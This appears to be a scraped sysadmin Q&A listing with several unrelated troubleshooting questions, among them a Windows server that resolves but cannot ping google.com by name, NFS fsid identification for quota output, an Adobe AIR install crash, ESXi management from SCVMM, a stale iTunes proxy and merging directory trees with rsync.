    On a windows 2003 server I can nslookup www.google.com which returns Server: localhost Address: 127.0.0.1 Non-authoritative answer: Name: www.l.google.com Addresses: 74.125.79.104, 74.125.79.147, 74.125.79.99 Aliases: www.google.com I can then ping 74.125.79.104: Pinging 74.125.79.104 with 32 bytes of data: Reply from 74.125.79.104: bytes=32 time=16ms TTL=54 Reply from 74.125.79.104: bytes=32 time=32ms TTL=54 Reply from 74.125.79.104: bytes=32 time=15ms TTL=54 Reply from 74.125.79.104: bytes=32 time=15ms TTL=54 Ping statistics for 74.125.79.104: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 15ms, Maximum = 32ms, Average = 19ms But I cannot ping www.google.com: Ping request could not find host www.google.com. Please check the name and try again. (this one is different from the other question in that this one has a TLD, it is not a local domain.) Update: I am running a dns server at localhost (127.0.0.1). Even when I change it to use for example opendns, it still can nslookup hostname and ping ip address, but not ping hostname. So what is wrong? Update 2: here is the ipconfig /all result: Windows IP Configuration Host Name . . . . . . . . . . . . : SERVER Primary Dns Suffix . . . . . . . : NETWORK.local Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : NETWORK.local Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #2 Physical Address. . . . . . . . . : 00-0F-1F-56-3B-AA DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.7.2 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.7.1 DNS Servers . . . . . . . . . . . : 127.0.0.1 Update 3: Thanks everyone for their help and suggestions. I appreciate that. Ipconfig /flushdns returns: Sucessfully flushed the DNS resolver cache Ipconfig /displaydns returns: 2.7.168.192.in-addr.arpa ---------------------------------------- Record Name . . . . . : 2.7.168.192.in-addr.arpa. Record Type . . . . . : 12 Time To Live . . . . : 0 Data Length . . . . . : 4 Section . . . . . . . : Answer PTR Record . . . . . : webserver.mydomainname.com 1.0.0.127.in-addr.arpa ---------------------------------------- Record Name . . . . . : 1.0.0.127.in-addr.arpa. Record Type . . . . . : 12 Time To Live . . . . : 0 Data Length . . . . . : 4 Section . . . . . . . : Answer PTR Record . . . . . : localhost Update 4: Wireshark shows the following: 3 11.540542 208.67.220.220 192.168.7.2 DNS Standard query response A 74.125.79.99 A 74.125.79.104 A 74.125.79.147 6 42.056794 192.168.7.2 192.168.7.255 NBNS Name query NB WWW.GOOGLE.COM<00> which is weird: when I ping, it sends a packet to 192.168.7.255 instead of asking the DNS server for an address

    Read the article

  • Getting at fsid under Linux? Or an alternate way of identifying filesystems?

    - by larsks
    In an environment with automounted home directories, such that the same filesystem exported by a fileserver may be mounted multiple times on the client, I would like to authoritatively be able to identify whether two mountpoints are in fact the same filesystem. That is, if the remote server exports: /home And the local client has: # mount fileserver:/home/l/lars on /home/lars type nfs (rw...) fileserver:/home/b/bob on /home/bob type nfs (rw...) I am looking for a way to identify that both /home/lars and /home/bob are in fact the same filesystem. In theory this is what the fsid result of the statvfs structure is for, but in all cases, for both local and remote filesystems, I am finding that the value of this structure member is 0. Is this some sort of client-side issue? Or do most modern NFS servers simply decline to provide a useful fsid? The end goal of all of this is to robustly interpret the output from the quota command for NFS filesystems. For example, given the example above, running quota as myself may return something like: Disk quotas for user lars (uid 6580): Filesystem blocks quota limit grace files quota limit grace otherserver:/vol/home0/a/alice 12 52428800 52428800 4 4294967295 4294967295 fileserver:/home/l/lars 9353032 9728000 10240000 124018 0 0 ...the problem here being that there exists a quota for me on otherserver which is visible in the results of the quota command, even though my home directory is actually on a different device. My plan was to look up the fsid for each mountpoint listed in the quota output and check to see if it matched the fsid associated with my home directory. It looks like this won't work, so...any suggestions?
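
    Not authoritative, but two hedged alternatives to reading fsid through statvfs(): GNU stat can print the kernel-reported filesystem ID directly, and on Linux the NFS client normally shares one superblock per remote filesystem (unless nosharecache is used), so comparing st_dev across mountpoints is often good enough:

        # Device number of each mountpoint; two automounted directories backed by
        # the same remote filesystem usually report the same st_dev.
        stat --format='%d  %n' /home/lars /home/bob

        # Filesystem ID as statfs() reports it, for comparison with the statvfs
        # fsid you are seeing as 0.
        stat -f --format='%i  %n' /home/lars /home/bob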

    Read the article

  • Blue screen of death while installing any Adobe Air application

    - by Gaurav Sharma
    Whenever I try to install an AIR application I get a Blue Screen and then my system restarts. I cannot even take a screenshot of it. This happens with every AIR application I try to install. I also searched for the same on the Adobe forums and found the same problem being faced by someone else. His problem was resolved by uninstalling a piece of software named "Folder Lock". I searched my hard disk for this software and found it, so I deleted that software (shift+delete) and removed all its traces from the registry too, but that still didn't solve the problem. I also tried disabling the antivirus software and then installing the AIR application, but this also didn't help. Here is the screenshot of the BSOD. I was able to install AIR applications earlier, but now I can't. Is anybody else having the same sort of problem? One colleague of mine is also having the same problem. Please help me out. My system's config is as follows: Windows XP Home SP3, Flash Builder 4 with SDK 4.1 and 3.5 installed, Adobe AIR v2.5, 1.5 GB RAM, 1.66 GHz processor. Thanks

    Read the article

  • How do I add a VMware ESXi Host to Microsoft Virtual Machine Manager?

    - by user63250
    I am trying to manage virtual machines running on a VMware ESXi host using Microsoft System Center Virtual Machine Manager. I was able to add the ESXi machine using the "Add VMware VirtualCenter server" option, but can't access any of the VMs on the datastore associated with this ESXi server. The datastore of the ESXi box is showing up with the correct name, but it won't let me see any of the VMs that have already been created; I get "There are no virtual machines on this host." Because I couldn't get any of the existing virtual machines to show up, I tried creating some new ones. When using VMM to connect to ESXi and create new VMs, I get the following error messages in the "rating explanation" section: The virtualization software on the selected host does not support virtual hard disks on an IDE bus. and The virtualization software on the host XXXXXX does not support the creation of dynamic virtual hard disk. Any ideas on why I can't manage existing machines and why I can't create new ones? The existing machines were created in vSphere. I should note that the ESXi server and the server running SCVMM are both on the same domain. I should also note that although the ESXi box has been added as a VirtualCenter server, when I try to add it through the "Add Host" option, I get an error message saying "Virtual Machine Manager cannot complete the VirtualCenter action on server EXSi because of the following error: The operation is not supported on the object."

    Read the article

  • iTunes' clandestine proxy settings

    - by pilcrow
    Problem: One user's iTunes consults a defunct HTTP proxy, but only for iTunes Store HTTP requests -- other iTunes web requests are unproxied. How do I dismiss this spurious proxy setting? Background: It's not as easy as Internet Options. Years ago my network had a mandatory HTTP proxy at 172.31.1.1:8080. When we switched to the 192.168.1/24 space and eliminated the proxy, this user's iTunes -- the only iTunes user at the time -- could no longer contact the iTunes Store, an operation which fails with "unknown error -9808". This has been the case through several iTunes.exe upgrades over the years and prevents, among other things, activation of a new or newly upgraded iPhone. wireshark and TCPView confirm that this user's iTunes.exe is attempting to contact the long-defunct http proxy when attempting to reach the iTunes Store, but is otherwise unproxied. Curious details: No other iTunes.exe HTTP traffic for this user is affected -- iTunes can successfully make HTTP chatter at Apple's servers. No other web traffic at all is proxied, whether this user or others, iTunes or browser, etc. I cannot find the spurious proxy setting anywhere in the registry nor on disk, though perhaps I haven't thought of every place to look and every format to look for. Other users who have experienced the same error code all seem to have unrelated web configuration problems (certificate validation, for example). UPDATE in response to Phoshi's excellent suggestion, reinstallation hasn't done the trick.

    Read the article

  • Update to Lion, Cannot boot into Bootcamp partitions, but can use in Parallels

    - by Jon Jester
    Using Snow Leopard, I had Boot Camp partitions for both XP and Windows 7. These were both accessible through Parallels 7 or through direct boot via Boot Camp. Each is on a separately partitioned hard drive. After upgrading to Lion, both are still accessible through Parallels, but I have not been able to boot directly into either. Unfortunately it is important to me to be able to boot into at least the Windows 7 partition. I have tried virtually everything I can find online. I've seen similar issues, but nothing where the partitions were usable virtually but not directly. Nothing works. I've tried rEFIt, correcting the master boot records in Windows from the command line, and have wiped the Windows 7 partition clean and reinstalled Windows 7 several times, first using Boot Camp 4 drivers and then Boot Camp 3 drivers. I have also tried resizing the Boot Camp partitions. When booting into the Boot Camp partitions directly, it will go all the way to the desktop before it fails, where I get a Windows error screen. I can see all the disks and their appropriate partitions both in OS X Disk Utility and in the Windows installer utility.

    Read the article

  • Recursive move utility on Unix?

    - by Thomas Vander Stichele
    Sometimes I have two trees that used to have the same content, but have grown out of sync (because I moved disks around or whatever). A good example is a tree where I mirror upstream packages from Fedora. I want to merge those two trees again by moving all of the files from tree1 into tree2. Usually I do this with: rsync -arv tree1/* tree2 Then delete tree1. However, this takes an awful lot of time and disk space, and it would be much easier to be able to do: mv -r tree1/* tree2 In other words, a recursive move. It would be faster because, first of all, it would not even copy, just move the inodes, and second, I wouldn't need a delete at the end. Does this exist? As a test case, consider the following sequence of commands: $ mkdir -p a/b $ touch a/b/c1 $ rsync -arv a/ a2 sending incremental file list created directory ./ b/ b/c1 b/c2 sent 173 bytes received 57 bytes 460.00 bytes/sec total size is 0 speedup is 0.00 $ touch a/b/c2 What command would now have the effect of moving a/b/c2 to a2/b/c2 and then deleting the a subtree (since everything in it is already in the destination tree)?
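
    There is no standard recursive mv that merges one tree into another, but a sketch of the closest common substitute for the test case above; note that rsync still copies data rather than renaming inodes, it just saves the separate delete pass:

        # Move the contents of a/ into a2/ (a/b/c2 ends up as a2/b/c2), then
        # prune the empty directories rsync leaves behind in the source tree.
        rsync -a --remove-source-files a/ a2/
        find a -depth -type d -empty -delete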

    Read the article
